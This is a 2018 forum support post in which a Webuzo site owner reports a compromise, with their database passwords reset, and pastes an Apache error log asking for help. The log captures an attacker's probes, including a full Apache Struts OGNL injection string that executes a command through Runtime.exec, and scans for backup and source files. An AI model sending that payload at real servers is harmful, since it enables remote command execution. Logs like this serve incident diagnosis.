Welcome Guest. Please Login or Register  


You are here: Index > Webuzo > General Support > Topic : hack or bug?



Threaded Mode | Print  

 hack or bug?, Something hack my site on webuzo control panel (0 Replies, Read 1039 times)
syntecom
Group: Member
Post Group: Newbie
Posts: 1
Status:
Hi, I'm new on Webuzo control panel administration... I have my site on VPS Digital Ocean...

Since yesterday I figured out that all my password user access (MySQL DB) has changed to the numer "1" hashed in MD5. So, all my users lose his access..

something has hacked my control panel, something is trying to execute .vb extension on every php page of my site...

My password control panel (webuzzo) is the same (pretty complicate) so I think they access exploting some "BUG" on
third-party tools. Some idea??

I'm attaching the complete error log to this topic.

Thanks in advance... excuse my english please.

Error LOG example---------------------------------------------------

[Sun Sep 09 11:27:24.315808 2018] [core:error] [pid 27063] (36)File name too long: [client 190.112.100.129:56843] AH00036: access to /scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json failed (filesystem path '/home/cpcelr/public_html/scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json')
[Sun Sep 09 11:27:23.829682 2018] [core:error] [pid 28402] (36)File name too long: [client 190.112.100.129:56839] AH00036: access to /scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json failed (filesystem path '/home/cpcelr/public_html/scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json')
[Sun Sep 09 11:26:46.367792 2018] [core:error] [pid 27477] (36)File name too long: [client 190.112.100.129:56718] AH00036: access to /3dParty/colorbox/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?

[Sun Sep 09 11:21:56.262909 2018] [:error] [pid 26189] [client 190.112.100.129:55063] PHP Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, string given in /home/cpcelr/public_html/noticia.php on line 7
[Sun Sep 09 11:21:55.269229 2018] [:error] [pid 2751] [client 190.112.100.129:55056] script '/home/cpcelr/public_html/tecnica-maletin.php.vb' not found or unable to stat
[Sun Sep 09 11:21:54.711651 2018] [:error] [pid 26189] [client 190.112.100.129:55054] script '/home/cpcelr/public_html/tecnica-maletin.php.cs' not found or unable to stat
[Sun Sep 09 11:21:54.142623 2018] [:error] [pid 27063] [client 190.112.100.129:55052] script '/home/cpcelr/public_html/Copy of tecnica-maletin.php' not found or unable to stat
[Sun Sep 09 11:21:52.437285 2018] [:error] [pid 16393] [client 190.112.100.129:55044] script '/home/cpcelr/public_html/tecnica-maletin.php.bak' not found or unable to stat
[Sun Sep 09 11:21:40.274565 2018] [:error] [pid 26188] [client 190.112.100.129:55008] script '/home/cpcelr/public_html/servicios-reglamento.php.vb' not found or unable to stat
[Sun Sep 09 11:21:39.713788 2018] [:error] [pid 27063] [client 190.112.100.129:55006] script '/home/cpcelr/public_html/servicios-reglamento.php.cs' not found or unable to stat
[Sun Sep 09 11:21:39.155558 2018] [:error] [pid 26190] [client 190.112.100.129:55001] script '/home/cpcelr/public_html/Copy of servicios-reglamento.php' not found or unable to stat
[Sun Sep 09 11:21:37.442874 2018] [:error] [pid 27063] [client 190.112.100.129:54996] script '/home/cpcelr/public_html/servicios-reglamento.php.bak' not found or unable to stat
[Sun Sep 09 11:21:08.379206 2018] [:error] [pid 16393] [client 190.112.100.129:54865] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:08.379177 2018] [:error] [pid 16393] [client 190.112.100.129:54865] PHP Warning: array_keys() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:07.811457 2018] [:error] [pid 27078] [client 190.112.100.129:54862] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:07.811418 2018] [:error] [pid 27078] [client 190.112.100.129:54862] PHP Warning: array_keys() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:06.613840 2018] [:error] [pid 26190] [client 190.112.100.129:54856] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:06.613797 2018] [:error] [pid 26190] [client 190.112.100.129:54856] PHP Warning: array_keys() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:05.505184 2018] [:error] [pid 27078] [client 190.112.100.129:54852] script '/home/cpcelr/public_html/servicios-fondo.php.vb' not found or unable to stat
[Sun Sep 09 11:21:04.934223 2018] [:error] [pid 26189] [client 190.112.100.129:54849] script '/home/cpcelr/public_html/servicios-fondo.php.cs' not found or unable to stat
[Sun Sep 09 11:21:04.664179 2018] [:error] [pid 26188] [client 190.112.100.129:54848] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
IP: --   

« Previous    Next »

Threaded Mode | Print  



Jump To :


Users viewing this topic
1 guests, 0 users.


All times are GMT. The time now is December 17, 2018, 9:53 am.

  Powered By AEF 1.0.8 © 2007-2008 Electron Inc.Queries: 11  |  Page Created In:1.512